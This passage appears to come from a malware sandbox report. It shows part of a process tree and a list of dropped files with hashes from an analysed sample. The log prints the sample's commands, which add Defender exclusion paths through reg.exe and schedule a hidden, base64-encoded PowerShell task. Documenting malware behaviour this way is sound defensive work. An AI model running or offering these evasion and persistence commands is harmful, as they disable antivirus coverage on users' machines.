                                                                                                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
                                                                                                                                                                                          3⤵
                                                                                                                                                                                            PID:1224
                                                                                                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
                                                                                                                                                                                            3⤵
                                                                                                                                                                                              PID:324
                                                                                                                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
                                                                                                                                                                                              3⤵
                                                                                                                                                                                                PID:3696
                                                                                                                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\kMzhLfoTcrKrxiyap /t REG_DWORD /d 0 /reg:32
                                                                                                                                                                                                3⤵
                                                                                                                                                                                                  PID:2780
                                                                                                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\kMzhLfoTcrKrxiyap /t REG_DWORD /d 0 /reg:64
                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                    PID:4968
                                                                                                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\LLfSdsPOWigSJrdI /t REG_DWORD /d 0 /reg:32
                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                      PID:5020
                                                                                                                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\LLfSdsPOWigSJrdI /t REG_DWORD /d 0 /reg:64
                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                        PID:2472
                                                                                                                                                                                                    • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                      schtasks /CREATE /TN "gfHpXHIGw" /SC once /ST 00:33:04 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                      • Creates scheduled task(s)
                                                                                                                                                                                                      PID:5580
                                                                                                                                                                                                    • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                      schtasks /run /I /tn "gfHpXHIGw"
                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                        PID:3284
                                                                                                                                                                                                    • C:\Users\Admin\AppData\Roaming\rdhvdej
                                                                                                                                                                                                      C:\Users\Admin\AppData\Roaming\rdhvdej
                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                                                      • Checks SCSI registry key(s)
                                                                                                                                                                                                      PID:392
                                                                                                                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 392 -s 348
                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                        • Program crash
                                                                                                                                                                                                        PID:4116
                                                                                                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -pss -s 444 -p 392 -ip 392
                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                        PID:2204
                                                                                                                                                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                                                                                                                                                                                                        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                          PID:4992
                                                                                                                                                                                                          • C:\Windows\system32\gpupdate.exe
                                                                                                                                                                                                            "C:\Windows\system32\gpupdate.exe" /force
                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                              PID:4436

                                                                                                                                                                                                          Network

                                                                                                                                                                                                          MITRE ATT&CK Enterprise v15

                                                                                                                                                                                                          Replay Monitor

                                                                                                                                                                                                          Loading Replay Monitor...

                                                                                                                                                                                                          Downloads

                                                                                                                                                                                                          • C:\ProgramData\Are.docx

                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                            11KB

                                                                                                                                                                                                            MD5

                                                                                                                                                                                                            a33e5b189842c5867f46566bdbf7a095

                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                            e1c06359f6a76da90d19e8fd95e79c832edb3196

                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                            5abf8e3d1f78de7b09d7f6fb87f9e80e60caacf13ef3c1289665653dacd7c454

                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                            f2ad3812ec9b915e9618539b0f103f2e9acaad25fbbacd84941c954ce070af231324e83a4621e951c1dbae8d40d50410954e40dd52bbd46e34c54b0d1957407b

                                                                                                                                                                                                          • C:\ProgramData\E_MountLite_66\E_MountLite_66.exe

                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                            640KB

                                                                                                                                                                                                            MD5

                                                                                                                                                                                                            0d241bcc17fb58aa37da3c5ddc538b58

                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                            2a94a3d52830f97de196e55c3e39878ddadc0be5

                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                            a17f0d3b536118dcae926cf732bade7d466833491cfc660dd77571f81d384514

                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                            eb0767906089d4778843f687742f70f5d437dd90a5fef73fb69e6f011757d87cd22462c34a9ecc8da8f52b01e2a615a7effe814b1ab28e15d556e9e0f2fa94cf

                                                                                                                                                                                                          • C:\ProgramData\mozglue.dll

                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                            593KB

                                                                                                                                                                                                            MD5

                                                                                                                                                                                                            c8fd9be83bc728cc04beffafc2907fe9

                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                            95ab9f701e0024cedfbd312bcfe4e726744c4f2e

                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                            ba06a6ee0b15f5be5c4e67782eec8b521e36c107a329093ec400fe0404eb196a

                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                            fbb446f4a27ef510e616caad52945d6c9cc1fd063812c41947e579ec2b54df57c6dc46237ded80fca5847f38cbe1747a6c66a13e2c8c19c664a72be35eb8b040

                                                                                                                                                                                                          • C:\ProgramData\nss3.dll

                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                            2.0MB

                                                                                                                                                                                                            MD5

                                                                                                                                                                                                            1cc453cdf74f31e4d913ff9c10acdde2

                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                            6e85eae544d6e965f15fa5c39700fa7202f3aafe

                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                            ac5c92fe6c51cfa742e475215b83b3e11a4379820043263bf50d4068686c6fa5

                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                            dd9ff4e06b00dc831439bab11c10e9b2ae864ea6e780d3835ea7468818f35439f352ef137da111efcdf2bb6465f6ca486719451bf6cf32c6a4420a56b1d64571

                                                                                                                                                                                                          • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA

                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                            1KB

                                                                                                                                                                                                            MD5

                                                                                                                                                                                                            9da3b5b4a894c15d1aa6d3d5da27ee05

                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                            0d16e87371ab9401b56eb65a272347758566941b

                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                            5d3ca1af142868ad96cffad80f8828660ef8fc2de231848cf76bd714ca68e37a

                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                            8caa5f7d48de98fe9858cea339f6e08f8ef099a268f5fe644f91e2cf815be613bc59f1b48bff1e7413ecd57d3dc3db57c8cdd1a9987f4b5fd720fd96320a0d37

                                                                                                                                                                                                          • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CAF4703619713E3F18D8A9D5D88D6288_F2DAF19C1F776537105D08FC8D978464

                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                            724B

                                                                                                                                                                                                            MD5

                                                                                                                                                                                                            8202a1cd02e7d69597995cabbe881a12

                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                            8858d9d934b7aa9330ee73de6c476acf19929ff6

                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                            58f381c3a0a0ace6321da22e40bd44a597bd98b9c9390ab9258426b5cf75a7a5

                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                            97ba9fceab995d4bef706f8deef99e06862999734ebe6a05832c710104479c6337cbf0a76e1c1e0f91566a61334dc100d837dfd049e20da765fe49def684f9c9

                                                                                                                                                                                                          • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA

                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                            410B

                                                                                                                                                                                                            MD5

                                                                                                                                                                                                            645dee274ea761d6361613c34e97994c

                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                            e1363f1e4bdb5592a6294a78c7822d30276e7f2d

                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                            ed9e693a4c1224dac7ef73343a5f423d92379ceb4a7263538803d071e9027a76

                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                            a2df7b7abad222c01eced9ce265cceea497cb0bfd193ee2940b3c5b9293f594d65842408fb44b9df3f2d5c176a6abc1aa232e7eb2a95e108f3437ce1d3d309e1

                                                                                                                                                                                                          • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CAF4703619713E3F18D8A9D5D88D6288_F2DAF19C1F776537105D08FC8D978464

                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                            392B

                                                                                                                                                                                                            MD5

                                                                                                                                                                                                            7ad07d3a9fac78737bccf804d9309424

                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                            d4f9203c8464e854361003a708256784ab219f6b

                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                            17687cb9f0a9fe686dd1a013e15e4568b4121ee6089b659d1a153767320b599c

                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                            42a918827c465486758a4315de55f659db5dfb9e6b3327c45d992064aa83a1cd9a0e5177e8542ebea2c1bf3c00f16bcf915d951c1d38d267e258521e681a5ffe

                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\DiskEject\diskeject.exe

                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                            896KB

                                                                                                                                                                                                            MD5

                                                                                                                                                                                                            308e2d4c03786a62ae1ba9cc607ce12c

                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                            3b3e0a6b7d5fb150516edf557fddee2a04aef9ca

                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                            3b70963570bedf326b5c5e4cf4678257baa38231e4c27d995d57f6cb53ad986b

                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                            801dc9d3396dfdbf777a317ce4e605d8c5ebe3d9f7916cae9a3c2b2bbf064709e151d93988fcb39bf47fc699a66eb7b6057f9e82b8973b5b93ccbd0696ed5595

                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\DiskEject\diskeject.exe

                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                            768KB

                                                                                                                                                                                                            MD5

                                                                                                                                                                                                            ae1f9db87efd251c5b1aa2befb9c412f

                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                            c441902902c1ada6b552cecaeb6a062a96d5c642

                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                            18f0f3eb03ab85cf5b74ca51e666473e8ece4a75935f80053eaa8871909678de

                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                            6f6884b731c5d9de05fc65a14c409bac05530e4e26336ee391d9d9e34aa5bb7b5e3deb5cc7f09f6fad8c5caa6f6da3a3bd035283ea59733dec61a9a375de6abf

                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\DiskEject\diskeject.exe

                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                            192KB

                                                                                                                                                                                                            MD5

                                                                                                                                                                                                            098a82d2ccbf542f50bbec97d5c65789

                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                            2ecc06428da1ca30443e778b72b61f39abe4c6a9

                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                            d98a38ae38c90e81203b5de3c414027f7e860dde0cd65b031f3871c917b4520b

                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                            1d92e7b7b97ba58047dc154e673bf6f730dae59ee5165ef60cb76a70eff5dd0beece0012187df2dc4de9692e48fb73dec0265603e38a261037a287c67df0ff3e

                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences

                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                            55KB

                                                                                                                                                                                                            MD5

                                                                                                                                                                                                            ea8bfa7b3cc68a54ba3bac1187004e84

                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                            8b2a48f8a4522ebe15ab36c7652d4ec0e0483d89

                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                            54b6c1da797b6476204df9b9e57b1e8bdafac7f01a48810f35d393fe1393f304

                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                            c3945c56ba032bcda30c5875284ed8e11ce5b709d7df0bff5184d5920c75282f72507dcf75bb9ef04c35eb38dcd108824dc24ca52819a346acbf0d3a98a296b0

                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\7zS2287.tmp\Install.exe

                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                            320KB

                                                                                                                                                                                                            MD5

                                                                                                                                                                                                            9bf9f0436ed1832e423e090f5d15e568

                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                            145f47837de214012ab95b3e756669c8901f9e1e

                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                            86adca15becba10aa7280193a285f9b5659325f5ebfd141e140655a3db427a37

                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                            2669c165d4f9202fe152a654574358d62af7136165e90070bcac5b039d8237d18fec0cea37c1fd46af1f378566a3bc677f36d4b2e014b1fd6f0e63cf00b448c8

                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\7zS2287.tmp\Install.exe

                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                            128KB

                                                                                                                                                                                                            MD5

                                                                                                                                                                                                            c76ceab59da15564b9a1510ebc2fe93d

                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                            e92fffc58b820e1a2990264fe2ff9677e43b3cba

                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                            226029fa2cb8e0915cc3846ca8a5e404e2fbbd76fa9a1a84ddc891d3216d906d

                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                            25475c37bf6257297ad85dd2a52b96ad93caf02b06c2bee54e4246be82aa856208b0bc7fc1edc2fcada9ec0d71df85e420b9c09ab9d25d1744fd5bba05235cc7

                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\7zS35FF.tmp\Install.exe

                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                            704KB

                                                                                                                                                                                                            MD5

                                                                                                                                                                                                            fd04e762cc4766fa84ebe66152115fc5

                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                            45698945a40defcc7c721d58f067355f6d5046f3

                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                            fed838bd03560649f5299a769ed77ffef470c69cc6ddd8dc7ebfc7ef581f1096

                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                            70089a9295b9a7f8d3b5ecf840f88e35b6c4a50ca5860e518369981b69bdedba7ea31c78b594145dc9101af298d64c70dc4e969ee0679238edb4db9a115be33a

                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\7zS35FF.tmp\Install.exe

                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                            2.9MB

                                                                                                                                                                                                            MD5

                                                                                                                                                                                                            916a9967455fd4fd20b9b39ce4668dc6

                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                            4e31f16ff3c796b68336a0b40975c3d7cba83c88

                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                            56593bc30925e82424052fae92e4febd3e051657abee74016d1cf46afd2ecdd3

                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                            225b106e20481ffaefd200dbe08b952bfd4d26b2320b272dab4b2041cf59fb3d959ebf5daa201fcbc886ce2e024a7abdcefa03667d0224d3eea381b37b31f1fc

                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\Protect544cd51a.dll

                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                            742KB

                                                                                                                                                                                                            MD5

                                                                                                                                                                                                            544cd51a596619b78e9b54b70088307d

                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                            4769ddd2dbc1dc44b758964ed0bd231b85880b65

                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                            dfce2d4d06de6452998b3c5b2dc33eaa6db2bd37810d04e3d02dc931887cfddd

                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                            f56d8b81022bb132d40aa78596da39b5c212d13b84b5c7d2c576bbf403924f1d22e750de3b09d1be30aea359f1b72c5043b19685fc9bf06d8040bfee16b17719

                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_m4udbs1e.qvs.ps1

                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                            60B

                                                                                                                                                                                                            MD5

                                                                                                                                                                                                            d17fe0a3f47be24a6453e9ef58c94641

                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                            6ab83620379fc69f80c0242105ddffd7d98d5d9d

                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                            96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                            5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\is-3L8B1.tmp\_isetup\_iscrypt.dll

                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                            2KB

                                                                                                                                                                                                            MD5

                                                                                                                                                                                                            a69559718ab506675e907fe49deb71e9

                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                            bc8f404ffdb1960b50c12ff9413c893b56f2e36f

                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                            2f6294f9aa09f59a574b5dcd33be54e16b39377984f3d5658cda44950fa0f8fc

                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                            e52e0aa7fe3f79e36330c455d944653d449ba05b2f9abee0914a0910c3452cfa679a40441f9ac696b3ccf9445cbb85095747e86153402fc362bb30ac08249a63

                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\is-HBHE5.tmp\BfE8yx2fkiu6S97L10r7DVbH.tmp

                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                            689KB

                                                                                                                                                                                                            MD5

                                                                                                                                                                                                            956fd09810c6edb78fa81f98b7c7ae0d

                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                            94170850cacdcb1c46348bf28aa84e135b2abbab

                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                            b0f8ef03f6da9ade9149c1fde5233c5e0b6a29f2ff64e7506e96c79bbbf180be

                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                            de28d055c13aa0fbe2d514d26515f635b37b24f58496864cdd2e17d088fe7397a73577a6e82e540fa9058d971b7573c1f99eb4bcbd1977624a75fea85b299e4a

                                                                                                                                                                                                          • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\qemu-ga.exe

                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                            4KB

                                                                                                                                                                                                            MD5

                                                                                                                                                                                                            a5ce3aba68bdb438e98b1d0c70a3d95c

                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                            013f5aa9057bf0b3c0c24824de9d075434501354

                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                            9b860be98a046ea97a7f67b006e0b1bc9ab7731dd2a0f3a9fd3d710f6c43278a

                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                            7446f1256873b51a59b9d2d3498cef5a41dbce55864c2a5fb8cb7d25f7d6e6d8ea249d551a45b75d99b1ad0d6fb4b5e4544e5ca77bcd627717d6598b5f566a79

                                                                                                                                                                                                          • C:\Users\Admin\Documents\GuardFox\0Q8uyAZHlmlFjtnqMRSKNaWR.exe

                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                            1.6MB

                                                                                                                                                                                                            MD5

                                                                                                                                                                                                            7833cdfd93cad1ea3f134206d8d5ce3a

                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                            06550a5197fd4293bae76c8a3f36fa7d1efb9184

                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                            9fe595050917dcbc84148791e0984fa50b78fddd95a13b3a1e459ce829526982

                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                            5469671d36fb69812a2de6f42f20e3b2f525d148e3ea2d8d6bb53529ce4e64ce3eeea7a795ed79e314347ec857ca7ea33c8c2ed0f9592c37f65e7a5c4ef0abbc

                                                                                                                                                                                                          • C:\Users\Admin\Documents\GuardFox\0Q8uyAZHlmlFjtnqMRSKNaWR.exe

                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                            5.3MB

                                                                                                                                                                                                            MD5

                                                                                                                                                                                                            da930cadf742e9b7d730b23a232fe2c7

                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                            fc5cf9656d29bcb58bc75f636d762441f7124232

                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                            1a1c3b89eb590651d5a46cb22b5a86e090502698cbad08dce82f1f6d3819fbd2

                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                            5a40c0e3bdd1407ce6455d2b76d92898c227bb21555abd4e5fa5ac240bfc3722770a11b51436295e71d192650e3445c946e5e2d268358156f4a833c97f139ec7

                                                                                                                                                                                                          • C:\Users\Admin\Documents\GuardFox\0Q8uyAZHlmlFjtnqMRSKNaWR.exe

                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                            5.3MB

                                                                                                                                                                                                            MD5

                                                                                                                                                                                                            c667c605fdc8a48bd6f633a25ccf71b3

                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                            3fef829703489097af260ef820fa58b94d438133

                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                            e45038a51bbe3ddad2d77dc2b1d72775a471b36c3bbb8d053d527021fc848927

                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                            36eb5bbfc9c2eae414abcb6a9f7a6ea2205f8514fab1233b1898007cdd6e687586b04282ff7bfe4c53a976cd16763a2244bfb418ee95215804bf251151e94887

                                                                                                                                                                                                          • C:\Users\Admin\Documents\GuardFox\6cYGcvtFY0A7rKnVNki2dVX9.exe

                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                            258KB

                                                                                                                                                                                                            MD5

                                                                                                                                                                                                            5d37fbb04a77641704922f39003726b2

                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                            4d15bee75cc3bb3e4140a5df68a89807dc3b4be8

                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                            069792a1a8d73e6056437729625fba756a5c99385d8bcb7baf3878b283f427cf

                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                            7dd8fe0d50c67c601fb19bddc11b10e19f9d0d34bc41712513c05392e587a5b0360015d5f4d225d86a949207952d6caf8b8a054ea2fd1296ebe11f54a641f935

                                                                                                                                                                                                          • C:\Users\Admin\Documents\GuardFox\BfE8yx2fkiu6S97L10r7DVbH.exe

                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                            4.0MB

                                                                                                                                                                                                            MD5

                                                                                                                                                                                                            e5300a9713ff06982a4c9468613c9d8c

                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                            014fd78ad8b43a54227dfaf9bf4b0fa647787d84

                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                            b6145bcff92030602dbc48122b8abdc38fb8304b8f2228746b8992283e0ac771

                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                            52d87120d15694cd2190dc4dd7dc48f70e4406625d5100b9425e5204058c1cf6396f95b08843860d5c5be51c4744dd52284dcab9b7b37196400161f4e2c26fa6

                                                                                                                                                                                                          • C:\Users\Admin\Documents\GuardFox\Ew0D6wCwNOM8qo1gbXAuFx0N.exe

                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                            4.7MB

                                                                                                                                                                                                            MD5

                                                                                                                                                                                                            9577be7a336522a38dc32d950e94da90

                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                            afafc3285acfe7b1a86a51bfbee6a3dc85107638

                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                            6c9062a64b8a6e67960d955e39f8bd1ea08e096bb51baa437659601100f27199

                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                            94a0da210d30e5cc3ca43f502d1d042c4a5c4253d94fef92ee133bbc8f193eaacdc7e4879838d21827aa11efcd6f85fdc443fb7d02d8d5db82096fe6bb6104d8

                                                                                                                                                                                                          • C:\Users\Admin\Documents\GuardFox\Ew0D6wCwNOM8qo1gbXAuFx0N.exe

                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                            4.7MB

                                                                                                                                                                                                            MD5

                                                                                                                                                                                                            eaa10ae5c43bc3acf4245b22d4b70050

                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                            d6a2598daee7c5db8398915b0736953060dbca39

                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                            bfbb67a72c2e129b59e06ab2e5ac44b712bbc90f030236a8ee2a47ae90717755

                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                            13b01f7c79409967db6350a5c007af4f764721482be730b26d9482c042fb2bbea72dd0ef963ca8ffe0be405661b3e2f5e7dc3b726b75d9b27021693c20be58bf

                                                                                                                                                                                                          • C:\Users\Admin\Documents\GuardFox\Ew0D6wCwNOM8qo1gbXAuFx0N.exe

                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                            1.2MB

                                                                                                                                                                                                            MD5

                                                                                                                                                                                                            c9d8fa64ef5c92cc7661727502af1790

                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                            bda7bedf7f3ba2755e5704163a161fba1ceb0012

                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                            1c5b90cd38fbef573cf638c78a4bf898f7ac2f6dd00df3dd2e2731639a0d8209

                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                            d475b074cab7c1be33aef5af2a0f39da209db1a120889d51f6f1e81fac89649d880e815640243059ab581984a0aba49d81c698000ed163541d38c2f97e0c3f4a

                                                                                                                                                                                                          • C:\Users\Admin\Documents\GuardFox\Ew0D6wCwNOM8qo1gbXAuFx0N.exe

                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                            1.6MB

                                                                                                                                                                                                            MD5

                                                                                                                                                                                                            c15220bf59f037754b98cb6896861400

                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                            51ee062e9e00b4342d8f44f7d8d8ab06556b03cd

                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                            9c9aa4a483d78aa68ffee75e7afce2434dba351ace4c6adb808194c3a7312564

                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                            2684bdb0343141747b2e2e4144ac1273d013b17fccaa361b34cbf098fd366a0b46595bc1b9c50105059f8f6a07c26ac6f743784650c164e46162846f570dc787

                                                                                                                                                                                                          • C:\Users\Admin\Documents\GuardFox\F0_VOT2nFJ6jwNcBGGlSS5B4.exe

                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                            243KB

                                                                                                                                                                                                            MD5

                                                                                                                                                                                                            9d14893eb776fd971eb45809d2abf800

                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                            6b234d003b9ba46ff6fef7c5b4b03e424c43e4a5

                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                            1693cf9aeb6bf3f1e31d0316068d4070203b798bf3a1f992008ca3dfb24021e4

                                                                                                                                                                                                            SHA512

